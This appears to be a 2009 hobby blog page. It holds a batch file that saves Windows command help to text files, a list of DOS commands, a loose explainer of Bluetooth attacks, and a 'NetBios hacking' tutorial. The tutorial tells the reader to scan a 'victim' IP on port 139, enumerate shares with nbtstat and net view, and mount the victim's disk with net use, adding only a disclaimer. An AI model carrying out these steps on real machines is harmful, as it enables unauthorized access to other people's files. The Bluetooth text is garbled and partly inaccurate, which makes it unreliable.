Saturday, April 4, 2009

Learn CMD commands in a new way..

Copy and paste the following code in notepad and save it as lecture.bat click to learn cmd commands.this will create notepads in ur D:\ drive which will contain explanation of various commands.

c:
copy/? >d:\copy.txt
dir/? >d:\dir.txt
rmdir/? >d:\rmdir.txt
format/? >d:\format.txt
diskpart/? >d:\diskpart.txt
tree/? >d:\tree.txt
telnet/? >d:\telnet.txt
time/? >d:\time.txt
net user/? >d:\netuser.txt
del/? >d:\del.txt
attrib/? >d:\attrib.txt
shutdown/? >d:\shutdown.txt
color/? >d:\color.txt
echo/? >d:\echo.txt
type/? >d:\type.txt
ipconfig/? >d:\ipconfig.txt
ipconfig/all/? >d:\ipconfigall.txt
netstat/? >d:\netstat.txt
nbstat/? >d:\nbstat.txt
netview/? >d:\netview.txt
ping/? >d:\ping.txt
chkdsk/? >d:\chkdsk.txt
ver/? >d:\ver.txt
cd/? >d:\cd.txt
net/? >d:\net.txt
fsutil/? >d:\fsutil.txt
erase/? >d:\erase.txt
tracert/? >d:\tracert.txt
bootcfg/? >d:\bootcfg.txt
driverquery/? >d:\driverquery.txt
getmac/? >d:\getmac.txt
netsh/? >d:\netsh.txt
systeminfo/? >d:\systeminfo.txt
print/? >d:\print.txt
prompt/? >d:\prompt.txt

All Dos Commands

ADDUSERS Add or list users to/from a CSV file
ARP Address Resolution Protocol
ASSOC Change file extension associations
ASSOCIAT One step file association
AT Schedule a command to run at a later time
ATTRIB Change file attributes
BOOTCFG Edit Windows boot settings
BROWSTAT Get domain, browser and PDC info
CACLS Change file permissions
CALL Call one batch program from another
CD Change Directory - move to a specific Folder
CHANGE Change Terminal Server Session properties
CHKDSK Check Disk - check and repair disk problems
CHKNTFS Check the NTFS file system
CHOICE Accept keyboard input to a batch file
CIPHER Encrypt or Decrypt files/folders
CleanMgr Automated cleanup of Temp files, recycle bin
CLEARMEM Clear memory leaks
CLIP Copy STDIN to the Windows clipboard.
CLS Clear the screen
CLUSTER Windows Clustering
CMD Start a new CMD shell
COLOR Change colors of the CMD window
COMP Compare the contents of two files or sets of files
COMPACT Compress files or folders on an NTFS partition
COMPRESS Compress individual files on an NTFS partition
CON2PRT Connect or disconnect a Printer
CONVERT Convert a FAT drive to NTFS.
COPY Copy one or more files to another location
CSVDE Import or Export Active Directory data
DATE Display or set the date
Dcomcnfg DCOM Configuration Utility
DEFRAG Defragment hard drive
DEL Delete one or more files
DELPROF Delete NT user profiles
DELTREE Delete a folder and all subfolders
DevCon Device Manager Command Line Utility
DIR Display a list of files and folders
DIRUSE Display disk usage
DISKCOMP Compare the contents of two floppy disks
DISKCOPY Copy the contents of one floppy disk to another
DNSSTAT DNS Statistics
DOSKEY Edit command line, recall commands, and create macros
DSADD Add user (computer, group..) to active directory
DSQUERY List items in active directory
DSMOD Modify user (computer, group..) in active directory
ECHO Display message on screen
ENDLOCAL End localisation of environment changes in a batch file
ERASE Delete one or more files
EXIT Quit the CMD shell

EXPAND Uncompress files

EXTRACT Uncompress CAB files
FC Compare two files
FDISK Disk Format and partition
FIND Search for a text string in a file
FINDSTR Search for strings in files
FOR Conditionally perform a command several times
FORFILES Batch process multiple files
FORMAT Format a disk
FREEDISK Check free disk space (in bytes)
FSUTIL File and Volume utilities
FTP File Transfer Protocol
FTYPE Display or modify file types used in file extension associations
GLOBAL Display membership of global groups
GOTO Direct a batch program to jump to a labelled line
HELP Online Help
HFNETCHK Network Security Hotfix Checker
IF Conditionally perform a command
IFMEMBER Is the current user in an NT Workgroup
IPCONFIG Configure IP
KILL Remove a program from memory
LABEL Edit a disk label
LOCAL Display membership of local groups
LOGEVENT Write text to the NT event viewer.
LOGOFF Log a user off
LOGTIME Log the date and time in a file
MAPISEND Send email from the command line
MEM Display memory usage
MD Create new folders
MODE Configure a system device
MORE Display output, one screen at a time
MOUNTVOL Manage a volume mount point
MOVE Move files from one folder to another
MOVEUSER Move a user from one domain to another
MSG Send a message
MSIEXEC Microsoft Windows Installer
MSINFO Windows NT diagnostics
MSTSC Terminal Server Connection (Remote Desktop Protocol)
MUNGE Find and Replace text within file(s)
MV Copy in-use files
NET Manage network resources
NETDOM Domain Manager
NETSH Configure network protocols
NETSVC Command-line Service Controller
NBTSTAT Display networking statistics (NetBIOS over TCP/IP)
NETSTAT Display networking statistics (TCP/IP)
NOW Display the current Date and Time
NSLOOKUP Name server lookup
NTBACKUP Backup folders to tape
NTRIGHTS Edit user account rights
PATH Display or set a search path for executable files
PATHPING Trace route plus network latency and packet loss
PAUSE Suspend processing of a batch file and display a message

PERMS Show permissions for a user
PERFMON Performance Monitor
PING Test a network connection
POPD Restore the previous value of the current directory saved by PUSHD
PORTQRY Display the status of ports and services
PRINT Print a text file
PRNCNFG Display, configure or rename a printer
PRNMNGR Add, delete, list printers set the default printer
PROMPT Change the command prompt
PsExec Execute process remotely
PsFile Show files opened remotely
PsGetSid Display the SID of a computer or a user
PsInfo List information about a system
PsKill Kill processes by name or process ID
PsList List detailed information about processes
PsLoggedOn Who's logged on (locally or via resource sharing)
PsLogList Event log records
PsPasswd Change account password
PsService View and control services
PsShutdown Shutdown or reboot a computer
PsSuspend Suspend processes
PUSHD Save and then change the current directory
QGREP Search file(s) for lines that match a given pattern.
RASDIAL Manage RAS connections
RASPHONE Manage RAS connections
RECOVER Recover a damaged file from a defective disk.
REG Read, Set or Delete registry keys and values
REGEDIT Import or export registry settings
REGSVR32 Register or unregister a DLL
REGINI Change Registry Permissions
REM Record comments (remarks) in a batch file
REN Rename a file or files.
REPLACE Replace or update one file with another
RD Delete folder(s)
RDISK Create a Recovery Disk
RMTSHARE Share a folder or a printer
ROBOCOPY Robust File and Folder Copy
ROUTE Manipulate network routing tables
RUNAS Execute a program under a different user account
RUNDLL32 Run a DLL command (add/remove print connections)
SC Service Control
SCHTASKS Create or Edit Scheduled Tasks
SCLIST Display NT Services
ScriptIt Control GUI applications
SET Display, set, or remove environment variables
SETLOCAL Begin localisation of environment changes in a batch file
SETX Set environment variables permanently
SHARE List or edit a file share or print share
SHIFT Shift the position of replaceable parameters in a batch file
SHORTCUT Create a windows shortcut (.LNK file)
SHOWGRPS List the NT Workgroups a user has joined
SHOWMBRS List the Users who are members of a Workgroup
SHUTDOWN Shutdown the computer
SLEEP Wait for x seconds
SOON Schedule a command to run in the near future
SORT Sort input
START Start a separate window to run a specified program or command
SU Switch User
SUBINACL Edit file and folder Permissions, Ownership and Domain
SUBST Associate a path with a drive letter
SYSTEMINFO List system configuration
TASKLIST List running applications and services
TIME Display or set the system time
TIMEOUT Delay processing of a batch file
TITLE Set the window title for a CMD.EXE session
TOUCH Change file timestamps
TRACERT Trace route to a remote host
TREE Graphical display of folder structure
TYPE Display the contents of a text file
USRSTAT List domain usernames and last login
VER Display version information
VERIFY Verify that files have been saved
VOL Display a disk label
WHERE Locate and display files in a directory tree
WHOAMI Output the current UserName and domain
WINDIFF Compare the contents of two files or sets of files
WINMSD Windows system diagnostics
WINMSDP Windows system diagnostics II
WMIC WMI Commands
XCACLS Change file permissions
XCOPY Copy files and folders

Friday, April 3, 2009

BLUETOOTH HACKING

Bluetooth is wireless technology of data and voice. It requires very low power .It has range from 10m-100m.It can transfer upto 1Mb/s of data.

What is blue-tooth hacking ?
Blue-tooth hacking is hacking the other device without the knowing that device.It is also know as Bluesnarfing. Blue-tooth hacking not only limited to cell phones ,but it can also hacked the desktop computers ,LAP’s .

bluetooth logo

Types of hacking-
Their are types of blue-tooth hacking –
1.Bluesnarfing
2.Bluejacking
3.Bluebugging

Bluesnarfing is same as Bluetooth hacking. While Bluesnarfing is very much different from bluejacking.Bluesnarfing first introduced by Marcel Holtmann in October 2003. Example is transfer of images.

Bluejacking is harmless technology ,the personal information not exposed .In this name field is used to transfer the data.The example for is transfer of business card. Bluebugging was introduced by Martin Herfurt in March 2004.
Example of bluebugging is transfer of messages.

Problems faced by user
1.The hacker can delete or steal the contacts ,personal images etc.
2.The hacker can make the call orelse use internet at your expenses.
3.The hacker can default to factory setting to your device.
4.The hacker can clone your device so that your messages are also routed to another number. Cloning is also considered as illegal.

Method of hacking
The general method is guessing media access control or MAC address which is at application level that has 48-bit number and is unique among mobile devices .
Some of them are made for Unix platform while others can be used on Java or Symbian compatible cell phone.

As hacking is illegal then Blue-tooth hacking and Bluesnarfing are also illlegal . This arcticle is aware of Blue-tooth technology to the user.

Bluesnarfing: Type of Bluetooth Hackin

Bluesnarfing is one type of blue-tooth hacking. While it is similar to the bluejacking and bluebugging. It was discovered by Marcel Holtmann in october 2003.

Bluesnarfing is unauthorized access of information or data from wireless device through blue-toothtechnology. Connection is often between the desktop’s, LAP’s ,cellphones , PDA’s . Blue-tooth is very high speed but a short range wireless technology,in which exchanging of information between cellphones, deskstop’s. The most know device in which the blue-tooth is already installed is cellphones .

In this the attacker access the calendar, contact list and e-mail and text messages without leaving any evidence of the act. Other device is Laptop’s and computers ,they are having less frequency and more complex system than cellphones . The time required is attacking this device takes is more.

Bluesnarfing

Bluesnarfing

In bluesnarfing the exchange of Information takes place by guessing the MAC address. However this is difficult task for attacker ,the Bluetooth uses a 48-bit unique MAC Address. There are over 280 trillion possible addresses to guess .After guessing ,the attacker can synchronize the device which is know as pairing . Then at least the information is exchanged between the devices.

Bluesnarfing is considered as the illegal in many countries.To avoid bluesnarfing always switch off the blue tooth device to non-discoverable mode . Never pair the device with the unknown or public places.

NetBios Hacking For Windows 98/ME/NT/XP Tutorial

Well one of the famous, easy and easy to understand type of hacking is Net Bios. You can play with it as follows.

Disclaimer: We don’t take any responsibility for Illegal use of this tutorial.

Step 1
Get a IP (range) scanner. (superscanner is a fast one, get it here).
Scan the victim’s ip on TCP/IP port 139 (More info about TCP/IP port here)

Step 2
Open a dos prompt
Do this by going to start/run
enter command.com and press ok

this is what you see:
c:\windows>

This is what you need to type down:
Replace 255.255.255.255 with the victims IP address.

c:\windows>nbtstat -a 255.255.255.255

If you see this your in:

NetBIOS Remote Machine Name TableName Type Status
—————————————————————
user<00> UNIQUE Registered
workgroup <00> GROUP Registered
user <03> UNIQUE Registered
user <20> UNIQUE Registered

MAC Address = xx-xx-xx-xx-xx-xx
—————————————————————

If you don’t get the number <20>.
The victim disabled the File And Printer Sharing, find a another victim.

Step 3

type down:

c:\windows>net view \\255.255.255.255

if the output is like this:

Shared resources at \\255.255.255.255
ComputerNameGoesHere

Sharename Type Used as Comment

————————————————————
CDISK Disk xxxxx xxxxx

The command completed successfully.

“DISK” shows that the victim is sharing a Disk named as CDISK

Step 4

type down:
you can replace x: by anything letter yopu want but not your own drive letters.
CDISK is the name of the shared harddrive.

c:\windows>net use x: \\255.255.255.255\CDISK

If the command is successful we will get the confirmation.
The command was completed successfullly

Now open windows explorer or just double click on the My Computer icon on your
desktop and you will see a new network drive X:\> .

Hope you have enjoyed this small hacking tutorial.

Blog Widget by LinkWithin